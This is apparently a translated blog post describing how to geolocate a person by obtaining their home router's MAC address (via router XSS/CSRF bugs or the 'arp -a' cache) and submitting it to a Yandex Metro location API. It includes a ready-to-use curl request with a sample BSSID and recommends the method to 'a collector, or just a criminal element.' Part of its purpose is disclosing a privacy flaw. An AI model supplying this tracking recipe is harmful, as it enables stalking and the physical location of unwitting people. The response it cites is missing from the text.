We spy on everyone with Yandex.Metro

    Since Yandex, apparently, is not going to close its spyware "bug" , then let us actively use it.

    The ability to determine the user's physical location can sometimes be very useful if you are an employee of the Ministry of Truth, a collector, or just a criminal element.

    To do this, using the known XSS or CSRF vulnerability in the firmware of the home router ( one , two , three , etc.), determine the MAC address of the user's router (it will also be the BSSID of the Wi-Fi network). If you have direct access to the user's PC, then just look at the ARP cache on the PC using the “arp -a" command . Typically, the first line in the cache is the MAC address of the default gateway, which will be the desired BSSID.

    The received BSSID can be inserted into the request that Yandex.Metro sends:

    curl -i -s -k -X 'POST' \
    -H 'User-Agent: Dalvik / 2.1.0 (Linux; U; Android 5.0.1; Nexus 5 Build / LRX22C)' -H 'Content-Type: application / x-www-form-urlencoded '\
    ' http://mobile.maps.yandex.net/cellid_location/?clid=1866854&lac=-1&cellid=-1&operatorid=null&countrycode=null&signalstrength=-1&wifinetworks=EE43F6D1B690:-65&app=ymetro

    After which we will get this answer:

    The response packet contains the coordinates of the requested wi-fi access point, carefully collected and stored by Yandex. You can drive them into Google Maps and find the house you need. The coordinates are not always accurate, but they will work as a starting point for searches.

    Another interesting feature: the example shows the MAC address of the Krasnodar router (~ 1500 km to the metro). I hope this is a sign that we will have a subway soon!

    Also popular now: